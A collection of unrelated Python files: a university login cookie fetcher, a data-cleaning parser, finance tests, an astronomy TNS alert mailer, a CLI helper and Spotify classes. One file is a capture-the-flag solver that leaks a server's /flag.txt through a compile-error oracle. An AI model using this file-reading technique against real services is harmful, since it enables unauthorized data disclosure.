for k, v in each.cookies.items():
if k == '.ncov2019selfreport':
return f'{k}={v}'
return None
async def Read(self):
await self.get_key_()
if not isinstance(self.password,str) or len(self.password) < 20:
return 'erropw'
cookies = self.post_()
if not cookies:
return 'nocookie'
return cookies
@staticmethod
def read_js(path) -> str:
with open(path, 'r', encoding='utf-8') as f:
return f.read()
async def get_key_(self):
# page = await open_browser()
key_file_path = '/Users/tomjack/Desktop/code/Python/SHU_report_public/js_test/jiami.js'
key_js = self.read_js(key_file_path)
key_js += f'\ntest("{self.password}")'
key_value = await self.page.evaluate(key_js)
self.password = key_value
async def open_browser(self):
"""
Open the browser obj
:return : Page
:rtype : pyppeteer.Page
"""
if self.page:
return
browser = await launch({'headless': True, 'args': ['--disable-infobars', '--window-size=1920,1080', '--no-sandbox']})
# 打开一个页面
page = await browser.newPage()
await page.setViewport({'width': 1920, 'height': 1080}) # 设置页面的大小
self.page = page
return page
async def test_single(self):
print(self.password)
page = await self.open_browser()
password = await self.get_key_(page=page,password=self.password)
data = {
'username': self.username,
'password': password
}
if not isinstance(password,str):
return
return self.post_(data=data)
class CookiesPpeteer(CookiesGetter):
async def Read(self):
cookies = await get_cookies(self.page,self.username,self.password)
if not cookies:
return 'nocookie'
return cookies
if __name__ == '__main__':
cookies: str = get_cookies(None,"", "")
print(cookies)
# print(getUrl())
|
import os
import time
from .constraint import DenialConstraint
class Parser:
"""
This class creates interface for parsing denial constraints
"""
def __init__(self, env, dataset):
"""
Constructing parser interface object
:param session: session object
"""
self.env = env
self.ds = dataset
self.dc_strings = []
self.dcs = {}
def load_denial_constraints(self, f_path, f_name):
"""
Loads denial constraints from line-separated txt file
:param file_path: path to dc file
:param all_current_dcs: list of current dcs in the session
:return: list of Denial Constraint strings and their respective Denial Constraint Objects
"""
tic = time.clock()
if not self.ds.raw_data:
status = 'NO dataset specified'
toc = time.clock()
return status, toc - tic
attrs = self.ds.raw_data.get_attributes()
try:
dc_file = open(os.path.join(f_path,f_name), 'r')
status = "OPENED constraints file successfully"
if self.env['verbose']:
print (status)
for line in dc_file:
if not line.isspace():
line = line.rstrip()
self.dc_strings.append(line)
self.dcs[line] = (DenialConstraint(line,attrs,self.env['verbose']))
status = 'DONE Loading DCs from ' + f_name
except Exception as e:
status = ' '.join(['For file:', f_name, str(e)])
toc = time.clock()
return status, toc - tic
def get_dcs(self):
return self.dcs
|
def raiseExceptionDoNotCatch():
try:
print("In raiseExceptionDoNotCatch")
raise Exception
finally:
print("Finally executed in raiseExceptionDoNotCatch")
print("Will never reach this point")
print("\nCalling raiseExceptionDoNotCatch")
try:
raiseExceptionDoNotCatch()
except Exception:
print("Caught exception from raiseExceptionDoNotCatch in main program.")
|
from strategy.rebalance import get_relative_to_expiry_rebalance_dates, \
get_fixed_frequency_rebalance_dates, \
get_relative_to_expiry_instrument_weights
from strategy.calendar import get_mtm_dates
import pandas as pd
import pytest
from pandas.util.testing import assert_index_equal, assert_frame_equal
def assert_dict_of_frames(dict1, dict2):
assert dict1.keys() == dict2.keys()
for key in dict1:
assert_frame_equal(dict1[key], dict2[key], check_names=False)
def test_tradeables_dates():
# no CME holdiays between this date range
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-03-23")
exchanges = ["CME"]
tradeable_dates = get_mtm_dates(sd, ed, exchanges)
exp_tradeable_dates = pd.date_range(
"2015-01-02", "2015-03-23", freq="B"
)
assert_index_equal(tradeable_dates, exp_tradeable_dates)
# with an adhoc holiday
holidays = [pd.Timestamp("2015-01-02")]
tradeable_dates = get_mtm_dates(sd, ed, exchanges, holidays=holidays)
exp_tradeable_dates = pd.date_range(
"2015-01-03", "2015-03-23", freq="B"
)
assert_index_equal(tradeable_dates, exp_tradeable_dates)
# with CME holiday (New Years day)
sd = pd.Timestamp("2015-01-01")
ed = pd.Timestamp("2015-01-02")
tradeable_dates = get_mtm_dates(sd, ed, exchanges)
exp_tradeable_dates = pd.DatetimeIndex([pd.Timestamp("2015-01-02")])
assert_index_equal(tradeable_dates, exp_tradeable_dates)
def test_relative_to_expiry_rebalance_dates():
# each contract rolling individually, same offset
# change to ES and TY
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-03-23")
expiries = pd.DataFrame(
[["2015ESH", "2015-03-20", "2015-03-20"],
["2015ESM", "2015-06-19", "2015-06-19"],
["2015TYH", "2015-02-27", "2015-03-20"],
["2015TYM", "2015-05-29", "2015-06-19"]],
columns=["contract", "first_notice", "last_trade"]
)
offsets = -3
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=False, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(
["2015-01-02", "2015-02-24", "2015-03-17"]
)
assert_index_equal(rebal_dates, exp_rebal_dates)
# rolling all monthly contracts together, same offset
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=True, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(["2015-01-02", "2015-02-24"])
assert_index_equal(rebal_dates, exp_rebal_dates)
# rolling each contract individually, different offset
offsets = {"ES": -3, "TY": -4}
rebal_dates = get_relative_to_expiry_rebalance_dates(
sd, ed, expiries, offsets, all_monthly=False, holidays=None
)
exp_rebal_dates = pd.DatetimeIndex(
["2015-01-02", "2015-02-23", "2015-03-17"]
)
assert_index_equal(rebal_dates, exp_rebal_dates)
def test_relative_to_expiry_weights():
expiries = pd.DataFrame(
[["2015ESH", "2015-03-20", "2015-03-20"],
["2015ESM", "2015-06-19", "2015-06-19"],
["2015ESU", "2015-09-18", "2015-09-18"],
["2015TYH", "2015-03-16", "2015-03-20"],
["2015TYM", "2015-05-29", "2015-06-19"],
["2015TYU", "2015-08-31", "2015-09-21"]],
columns=["contract", "first_notice", "last_trade"]
)
# one generic and one product
dts = pd.date_range("2015-03-17", "2015-03-18", freq="B")
offsets = -3
root_gnrcs = {"ES": ["ES1"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame(
[1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-17"), "2015ESH"),
(pd.Timestamp("2015-03-18"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# multiple products
dts = pd.date_range("2015-03-13", "2015-03-20", freq="B")
offsets = -1
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESH"),
(pd.Timestamp("2015-03-17"), "2015ESH"),
(pd.Timestamp("2015-03-18"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESH"),
(pd.Timestamp("2015-03-20"), "2015ESM"),],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM"),
(pd.Timestamp("2015-03-17"), "2015TYM"),
(pd.Timestamp("2015-03-18"), "2015TYM"),
(pd.Timestamp("2015-03-19"), "2015TYM"),
(pd.Timestamp("2015-03-20"), "2015TYM"),],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# multiple generics
offsets = -1
dts = pd.date_range("2015-03-19", "2015-03-20", freq="B")
root_gnrcs = {"ES": ["ES1", "ES2"]}
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-19"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESM"),
(pd.Timestamp("2015-03-20"), "2015ESM"),
(pd.Timestamp("2015-03-20"), "2015ESU")],
names=("date", "contract")),
columns=["ES1", "ES2"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with dict of offsets
offsets = {"ES": -4, "TY": -1}
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
dts = pd.date_range("2015-03-13", "2015-03-17", freq="B")
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESH"),
(pd.Timestamp("2015-03-17"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM"),
(pd.Timestamp("2015-03-17"), "2015TYM")],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with holidays for relative roll
offsets = -1
root_gnrcs = {"ES": ["ES1"]}
holidays = [pd.Timestamp("2015-03-19").date()]
dts = pd.date_range("2015-03-18", "2015-03-19", freq="B")
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets, holidays=holidays
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-18"), "2015ESH"),
(pd.Timestamp("2015-03-19"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
)
}
assert_dict_of_frames(wts, exp_wts)
# with monthly flag
dts = pd.date_range("2015-03-13", "2015-03-16", freq="B")
root_gnrcs = {"ES": ["ES1"], "TY": ["TY1"]}
offsets = -1
wts = get_relative_to_expiry_instrument_weights(
dts, root_gnrcs, expiries, offsets, all_monthly=True
)
exp_wts = {
"ES": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015ESH"),
(pd.Timestamp("2015-03-16"), "2015ESM")],
names=("date", "contract")),
columns=["ES1"]
),
"TY": pd.DataFrame([1.0, 1.0],
index=pd.MultiIndex.from_tuples(
[(pd.Timestamp("2015-03-13"), "2015TYH"),
(pd.Timestamp("2015-03-16"), "2015TYM")],
names=("date", "contract")),
columns=["TY1"]
)
}
assert_dict_of_frames(wts, exp_wts)
def test_fixed_frequency_rebalance_dates():
sd = pd.Timestamp("2015-01-17")
ed = pd.Timestamp("2015-01-28")
freq = "monthly"
offset = -3
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28"])
assert_index_equal(dts, exp_dts)
ed = pd.Timestamp("2015-02-28")
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28", "2015-02-25"])
assert_index_equal(dts, exp_dts)
offset = [-3, -1]
ed = pd.Timestamp("2015-01-30")
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-17", "2015-01-28", "2015-01-30"])
assert_index_equal(dts, exp_dts)
sd = pd.Timestamp("2015-01-02")
ed = pd.Timestamp("2015-01-13")
freq = "weekly"
offset = [0, 2]
dts = get_fixed_frequency_rebalance_dates(sd, ed, freq, offset)
exp_dts = pd.DatetimeIndex(["2015-01-02", "2015-01-05", "2015-01-07",
"2015-01-12"])
assert_index_equal(dts, exp_dts)
|
#!/usr/bin/env python3.8
import json
import string
import sys
import urllib.request
url_base = "http://challenges2.france-cybersecurity-challenge.fr:6005/check"
COMPILE_SUCCESS = '{"result":0}'
COMPILE_FAILURE = '{"result":1}'
def get_size() -> int:
size = 0
while 1:
data = {"content":"let my_string : &[u8; "+str(size)+"] = include_bytes!(\"/flag.txt\");"}
jsonbytes = json.dumps(data).encode()
req = urllib.request.Request(url_base)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(jsonbytes))
response = urllib.request.urlopen(req, jsonbytes)
html = response.read().decode()
print(f"size={size}\r", end='')
if COMPILE_SUCCESS in html:
print()
return size
elif COMPILE_FAILURE in html:
size += 1
else:
print(html)
exit()
def get_flag(size: int) -> int:
flag = ""
for i in range(size-1):
for c in string.printable:
data = {"content": "const VALUE: i8 = 1 / (include_bytes!(\"/flag.txt\")["+str(i)+"] as i8 - b'"+c+"' as i8);"}
jsonbytes = json.dumps(data).encode()
req = urllib.request.Request(url_base)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(jsonbytes))
response = urllib.request.urlopen(req, jsonbytes)
html = response.read().decode()
print(f"flag={flag}{c}\r", end='')
if COMPILE_SUCCESS in html:
continue
elif COMPILE_FAILURE in html:
flag += c
break
else:
print(html)
exit()
print()
return flag
size = get_size()
print(f"size={size}")
size = 71
flag = get_flag(size)
print(f"flag={flag}")
|
#!/home/sonic/anaconda3/envs/astroconda/bin/python
# -*- coding: utf-8 -*-
#============================================================
# IMSNG MONITORING NEW TRANSIENT WITH TNS QUERY CODE
# 2017.09.14 CREATED BY Nikola Knezevic
# 2019.08.06 MODIFIED BY Gregory S.H. Paek
# 2019.08.07 MODIFIED BY Gregory S.H. Paek
# 2020.03.18 MODIFIED BY Gregory S.H. Paek
#============================================================
import os, glob
import numpy as np
import time, datetime
from astropy.io import ascii, fits
from astropy.coordinates import SkyCoord
from astropy.time import Time
import astropy.units as u
import requests
import json
from collections import OrderedDict
from astropy.table import Table, vstack, Column, MaskedColumn
############################# PARAMETERS #############################
# API key for Bot #
# GET KEY FROM PERSONAL TABLE
path_keys = '/home/sonic/Research/table/keys.dat'
keytbl = ascii.read(path_keys)
api_key = np.asscalar(keytbl['key'][keytbl['name']=='TNS']) #
# list that represents json file for search obj #
search_obj=[("ra",""), ("dec",""), ("radius",""), ("units",""), #
("objname",""), ("internal_name","")] #
# list that represents json file for get obj #
get_obj=[("objname",""), ("photometry","0"), ("spectra","1")] #
######################################################################
############################# URL-s #############################
# url of TNS and TNS-sandbox api #
url_tns_api="https://wis-tns.weizmann.ac.il/api/get" #
url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get" #
######################################################################
############################# DIRECTORIES ############################
# current working directory #
cwd=os.getcwd() #
# directory for downloaded files #
download_dir=os.path.join(cwd,'downloaded_files') #
######################################################################
########################## API FUNCTIONS #############################
# function for changing data to json format #
def format_to_json(source): #
# change data to json format and return #
parsed=json.loads(source,object_pairs_hook=OrderedDict) #
result=json.dumps(parsed,indent=4) #
return result #
#--------------------------------------------------------------------#
# function for search obj #
def search(url,json_list): #
try: #
# url for search obj #
search_url=url+'/search' #
# change json_list to json format #
json_file=OrderedDict(json_list) #
# construct the list of (key,value) pairs #
search_data=[('api_key',(None, api_key)), #
('data',(None,json.dumps(json_file)))] #
# search obj using request module #
response=requests.post(search_url, files=search_data) #
# return response #
return response #
except Exception as e: #
return [None,'Error message : \n'+str(e)] #
#--------------------------------------------------------------------#
# function for get obj #
def get(url,json_list): #
try: #
# url for get obj #
get_url=url+'/object' #
# change json_list to json format #
json_file=OrderedDict(json_list) #
# construct the list of (key,value) pairs #
get_data=[('api_key',(None, api_key)), #
('data',(None,json.dumps(json_file)))] #
# get obj using request module #
response=requests.post(get_url, files=get_data) #
# return response #
return response #
except Exception as e: #
return [None,'Error message : \n'+str(e)] #
#--------------------------------------------------------------------#
# function for downloading file #
def get_file(url): #
try: #
# take filename #
filename=os.path.basename(url) #
# downloading file using request module #
response=requests.post(url, files=[('api_key',(None, api_key))], #
stream=True) #
# saving file #
path=os.path.join(download_dir,filename) #
if response.status_code == 200: #
with open(path, 'wb') as f: #
for chunk in response: #
f.write(chunk) #
print ('File : '+filename+' is successfully downloaded.') #
else: #
print ('File : '+filename+' was not downloaded.') #
print ('Please check what went wrong.') #
except Exception as e: #
print ('Error message : \n'+str(e)) #
######################################################################
#============================================================#
# FUNCTION FOR ROUTINE
#============================================================#
def search_transient_routine(inim, url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get"):
obs = inim.split('-')[1]
# obs = 'KMTNET'
hdr = fits.getheader(inim)
dateobs = hdr['DATE-OBS']
t = Time(dateobs, format='isot')
jd = t.jd
mjd = t.mjd
radeg, dedeg = hdr['CRVAL1'], hdr['CRVAL2']
c = SkyCoord(radeg, dedeg, unit='deg')
radec = c.to_string('hmsdms', sep=':')
ra, dec = radec.split(' ')[0], radec.split(' ')[1]
radius = np.asscalar(obstbl[obstbl['obs'] == obs]['fov'])/2 # ['], [arcmin]
units = 'arcmin'
#------------------------------------------------------------
# SEARCH OBJECT
#------------------------------------------------------------
search_obj=[("ra",ra), ("dec",dec), ("radius",radius), ("units",units),
("objname",""), ("internal_name","")]
response=search(url_tns_sandbox_api,search_obj)
tnames = []
if None not in response:
json_data =format_to_json(response.text)
json_dict = json.loads(json_data)
if len(json_dict['data']['reply']) != 0:
transients = ''
for i in range(len(json_dict['data']['reply'])):
tname = json_dict['data']['reply'][i]['prefix']+'_'+json_dict['data']['reply'][i]['objname']
tnames.append(tname)
transients = transients+tname+','
transients = transients[:-1]
else:
transients = 'None'
else:
transients = 'None'
print(response[1])
#------------------------------------------------------------
inimtbl = Table( [[inim], [round(radeg, 5)], [round(dedeg, 3)], [ra], [dec], [dateobs], [round(jd, 5)], [round(mjd, 5)], [transients]],
names=('image', 'radeg', 'dedeg', 'ra', 'dec', 'dateobs', 'jd', 'mjd', 'transients'))
return inimtbl
#------------------------------------------------------------
def query_transient_routine_simple(qname, field, c, url_tns_sandbox_api="https://sandbox-tns.weizmann.ac.il/api/get", photometry='1', spectra='1'):
get_obj = [("objname", qname), ("photometry", photometry), ("spectra", spectra)]
response = get(url_tns_sandbox_api, get_obj)
#------------------------------------------------------------
if None not in response:
rows = [field]
cols = ['field']
json_data=format_to_json(response.text)
json_dict_targ = json.loads(json_data)
#------------------------------------------------------------
# EXTRACT INFORMATION
#------------------------------------------------------------
tc = SkyCoord(json_dict_targ['data']['reply']['ra'],
json_dict_targ['data']['reply']['dec'], unit=(u.hourangle, u.deg))
for key in ['objname', 'hostname', 'discoverydate','discoverymag', 'discmagfilter', 'internal_name', 'ra', 'radeg', 'dec', 'decdeg', 'object_type']:
if key == 'discmagfilter':
val = json_dict_targ['data']['reply'][key]['name']
elif key == 'object_type':
val = json_dict_targ['data']['reply'][key]['name']
else:
val = json_dict_targ['data']['reply'][key]
rows.append(val)
cols.append(key)
try:
rows.append(round(c.separation(tc).arcminute, 3))
except:
rows.append(-99)
cols.append('sep_arcmin')
#------------------------------------------------------------
rows = tuple(rows)
cols = tuple(cols)
return rows
else:
print (response[1])
return response[1]
#------------------------------------------------------------
def getCurrentStrTime():
return time.strftime("%Y%m%d-%H%M%S")
#============================================================#
# MAIN BODY
#============================================================#
starttime = time.time()
now = datetime.datetime.now()
print('# {}/{}/{} {}:{}:{}'.format(now.year, now.month, now.day, now.hour, now.minute, now.second))
outname = 'IMSNG-TNS-{}.dat'.format(getCurrentStrTime())
#------------------------------------------------------------
path_obs = '/home/sonic/Research/table/obs.txt'
path_input = '/home/sonic/Research/table/imsng-alltarget.dat'
path_key = '/home/Research/table/keys.dat'
path_save = '/data1/IMSNG'
refcats = glob.glob('/data1/IMSNG/IMSNG-TNS*.dat')
refcats.sort()
path_ref = refcats[-1]
#------------------------------------------------------------
obstbl = ascii.read(path_obs)
reftbl = ascii.read(path_ref)
intbl = ascii.read(path_input)
keytbl = ascii.read(path_key)
#------------------------------------------------------------
radius = 15
units = 'arcmin'
#------------------------------------------------------------
cols = ('field',
'objname',
'hostname',
'discoverydate',
'discoverymag',
'discmagfilter',
'internal_name',
'ra',
'radeg',
'dec',
'decdeg',
'object_type',
'sep_arcmin')
#------------------------------------------------------------
tblist = []
rowlist = []
for i in range(len(intbl)):
obj = intbl['obj'][i]
ra, dec = intbl['ra'][i], intbl['dec'][i]
c = SkyCoord(ra, dec, unit=(u.hourangle, u.deg))
# print('PROCESS\t{}\t[{}/{}]'.format(obj, i+1, len(intbl)))
search_obj = [("ra",ra), ("dec",dec), ("radius",radius), ("units",units),
("objname",""), ("internal_name","")]
response = search(url_tns_sandbox_api,search_obj)
tnames = []
if None not in response:
json_data = format_to_json(response.text)
json_dict = json.loads(json_data)
if len(json_dict['data']['reply']) != 0:
transients = ''
for i in range(len(json_dict['data']['reply'])):
tname = json_dict['data']['reply'][i]['objname']
tnames.append(tname)
transients = transients+tname+','
transients = transients[:-1]
else:
transients = 'None'
else:
transients = 'None'
print(response[1])
for qname in tnames:
# onetbl = query_transient_routine_simple(qname)
# onetbl['imsng'] = intbl['obj'][i]
# tblist.append(onetbl)
onerows = query_transient_routine_simple(qname, field=obj, c=c)
rowlist.append(onerows)
comtbl = Table(rows=rowlist, names=cols)
#------------------------------------------------------------
# CHECK NEW TRANSIENTs
#------------------------------------------------------------
newlist = []
for i, objname in enumerate(comtbl['objname']):
if objname not in reftbl['objname']:
newlist.append(comtbl[i])
if len(newlist) == 0:
print('THERE IS NO NEW ONE.')
pass
else:
print('NEW TRANSIDENT WAS REPORTED. SEND E-MAIL TO STAFFs...')
#------------------------------------------------------------
# SAVE TABLEs
#------------------------------------------------------------
comtbl.write(path_save+'/'+outname, format='ascii', overwrite=True)
# ascii.write(comtbl, path_save+'/'+outname, format='fixed_width_two_line')
newtbl = vstack(newlist)
# newtbl.write(path_save+'/NEW-'+outname, format='ascii', overwrite=True)
# ascii.write(newtbl, path_save+'/NEW-'+outname, format='fixed_width_two_line')
ascii.write(newtbl, path_save+'/NEW-'+outname, format='ascii')
#------------------------------------------------------------
# MAIL SETTING
#------------------------------------------------------------
reciver = ascii.read('/home/sonic/Research/table/imsng-mail-reciver.txt')
subject = '[IMSNG] {} NEW TRANSIENTs'.format(getCurrentStrTime())
# contents= 'CONTENTS'
import codecs
contents= codecs.open(path_save+'/NEW-'+outname, 'rb', 'utf-8')
indx = np.where(keytbl['name']=='ceouobs')
fromID, fromPW = keytbl['key'][indx].item(), keytbl['pw'][indx].item()
toIDs = ''
for address in reciver['address']: toIDs += address+','
toIDs = toIDs[:-1]
# toIDs = "gregorypaek94@gmail.com"
# ccIDs = 'gundam_psh@naver.com'
import glob
# path = glob.glob(save_path+'/'+eventname+'-*.txt')
import os
import smtplib
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.header import Header
#msg = MIMEBase('mixed')
#msg = MIMEText(contents, 'plain', 'utf-8')
msg = MIMEMultipart()
msg['Subject'] = Header(s=subject, charset="utf-8")
msg['From'] = fromID
msg['To'] = toIDs
msg.attach(MIMEText(contents.read()))
'''
# ATTACH TEXT FILE ON MAIL
if path != None:
if type(path) != list:
filelist = []
filelist.append(path)
else:
filelist = path
for file in filelist:
part = MIMEBase("application", "octet-stream")
part.set_payload(open(file, 'rb').read())
part.add_header( 'Content-Disposition',
'attachment; filename="%s"'% os.path.basename(file))
msg.attach(part)
# ATTACH PNG FILE ON MAIL
pnglist = glob.glob(save_path+'/'+eventname+'*.png')
for png in pnglist:
fp = open(png, 'rb')
img = MIMEImage(fp.read())
fp.close()
img.add_header('Content-Disposition', 'attachment', filename=os.path.basename(png))
msg.attach(img)
'''
#------------------------------------------------------------
# SEND MAIL
#------------------------------------------------------------
# ACCESS TO GMAIL
smtp_gmail = smtplib.SMTP_SSL('smtp.gmail.com', 465)
smtp_gmail.login(fromID, fromPW)
# smtp_gmail.sendmail(msg["From"], msg["To"].split(",") + msg["Cc"].split(","), msg.as_string())
smtp_gmail.sendmail(msg["From"], msg["To"].split(","), msg.as_string())
smtp_gmail.quit()
# comment = 'Send '+str(path)+'\nFrom\t'+fromID+'\nTo'; print(comment); print(toIDs)
print('SENDING E-MAIL COMPLETE.')
deltime = time.time() - starttime
print('\nDone.\t\t[{0} sec]'.format(round(deltime, 1)))
|
emptyForm = """
{"form": [
{
"type": "message",
"name": "note",
"description": "Connect to graphql"
},
{
"name": "url",
"description": "Graphql URL",
"type": "string",
"required": true
}
]}
"""
|
"""Input params handlers."""
from datetime import datetime
import re
from typing import List, Optional
from InquirerPy import inquirer # type: ignore
from redbrick.cli.cli_base import CLIInputParams
class CLIInputProfile(CLIInputParams):
"""Input profile handler."""
def __init__(
self,
entity: Optional[str],
profiles: List[str],
add: bool = False,
default: Optional[str] = None,
) -> None:
"""Init handlers."""
self.entity = entity
self.error_message = (
f"Non-alphanumeric / {'duplicate' if add else 'missing'} profile name"
)
self.add = add
self.profiles = profiles
self.default = default
def filtrator(self, entity: str) -> str:
"""Filter input entity."""
return entity.strip()
def validator(self, entity: str) -> bool:
"""Validate input entity."""
profile = self.filtrator(entity)
return (
profile.lower() != "default"
and re.match(r"^\w+$", profile) is not None
and (profile not in self.profiles if self.add else profile in self.profiles)
)
def get(self) -> str:
"""Get filtered profile value post validation."""
self.entity = self.from_args()
if self.entity is None:
if self.add:
self.entity = inquirer.text(
qmark=">",
amark=">",
message="Profile name:",
default="rb_" + datetime.strftime(datetime.now(), "%Y%m%d%H%M%S%f"),
transformer=self.filtrator,
filter=self.filtrator,
validate=self.validator,
invalid_message=self.error_message,
).execute()
elif self.profiles:
self.entity = inquirer.rawlist(
qmark=">",
amark=">",
message="Profile name:",
choices=self.profiles,
default=self.default,
).execute()
else:
raise ValueError("No profiles available")
return self.entity
|
from __future__ import annotations
import datetime
import itertools
from tkinter import messagebox
from typing import List
import arkhesPlaylists
from spotifyWrapper import spotify_wrapper
class ArkhesResource:
def __init__(self, data_dict: dict) -> None:
self._data_dict = data_dict
self._line = ''
self._line_number = -1
self._rating = -1
def to_json(self) -> dict:
return self._data_dict
def line_to_write(self) -> str:
if self.rating() < 0:
return self.uri()
else:
return f'{self.uri()} {self.rating()}'
def line(self) -> str:
return self._line
def line_number(self) -> int:
return self._line_number
def set_line(self, line: str, line_number: int) -> None:
self._line = line
self._line_number = line_number
def rating(self) -> int:
return self._rating
def set_rating(self, rating: int) -> None:
self._rating = rating
def name(self) -> str:
return self._data_dict['name']
def spotify_id(self) -> str:
return self._data_dict['id']
def type(self) -> str:
return self._data_dict['type']
def uri(self) -> str:
return self._data_dict['uri']
def id(self) -> str:
return self._data_dict['id']
def contents(self) -> List[ArkhesResource]:
return []
def track_uris(self) -> List[str]:
return [[item.uri() for item in self.contents()]]
def release_date(self) -> str:
return self._data_dict.get('release_date', '0000-00-00')
def popularity(self) -> int:
return self._data_dict['popularity']
def description(self) -> str:
return '[No Description]'
def type_name(self) -> str:
return '[None]'
def save_unasked(self) -> None:
pass
def unsave_unasked(self) -> None:
pass
def save(self) -> bool:
result = messagebox.askyesno('Delete', f'Do you really want to add {self.name()} to your saved {self.type_name()}s on Spotify?')
if result:
self.save_unasked()
return result
def unsave(self) -> bool:
result = messagebox.askyesno('Delete', f'Do you really want to remove {self.name()} from your saved {self.type_name()}s on Spotify?')
if result:
self.unsave_unasked()
return result
def is_saved(self) -> bool:
return False
def toggle_saved(self) -> bool:
if self.is_saved():
return self.unsave()
else:
return self.save()
@staticmethod
def flatten(uris: list) -> list:
return list(itertools.chain.from_iterable(uris))
class Album(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Song(item) for item in self._data_dict['tracks']['items']]
def number_of_tracks(self) -> int:
return self._data_dict['total_tracks']
def cover_url(self) -> str:
return self._data_dict['images'][0]['url']
def artist(self) -> Artist:
return Artist(self._data_dict['artists'][0]) #TODO: Handle multiple artists
def description(self) -> str:
return f'[Album]\n{self.name()}\nArtist: {self.artist().name()}\nRelease Date: {self.release_date()}'
def type_name(self) -> str:
return 'album'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_album(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_album(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_album(self)
class SpotifyPlaylist(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Song(track['track']) for track in self._data_dict['tracks']['items']]
def type_name(self) -> str:
return 'spotify playlist'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_playlist(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_playlist(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_playlist(self)
class Artist(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [Album(item) for item in self._data_dict['albums']]
def track_uris(self) -> List[str]:
return ArkhesResource.flatten([resource.track_uris() for resource in self.contents()])
def description(self) -> str:
return f'[Artist]\n{self.name()}\nRelease Date: {self.release_date()}'
def type_name(self) -> str:
return 'artist'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_artist(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_artist(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_artist(self)
class Song(ArkhesResource):
def contents(self) -> List[ArkhesResource]:
return [self]
def duration_ms(self) -> int:
return self._data_dict['duration_ms']
def duration(self) -> datetime.timedelta:
return datetime.timedelta(seconds=int(self.duration_ms()/1000))
def album(self) -> Album:
return Album(self._data_dict['album'])
def artist(self) -> Artist:
return Artist(self._data_dict['artists'][0]) #TODO: Handle multiple artists
def song(self) -> Song:
return self
def track_number(self) -> int:
return self._data_dict['track_number']
def type_name(self) -> str:
return 'song'
def save_unasked(self) -> None:
spotify_wrapper.add_saved_song(self)
def unsave_unasked(self) -> None:
spotify_wrapper.remove_saved_song(self)
def is_saved(self) -> bool:
return spotify_wrapper.is_saved_song(self)
class ArkhesPlaylist(ArkhesResource):
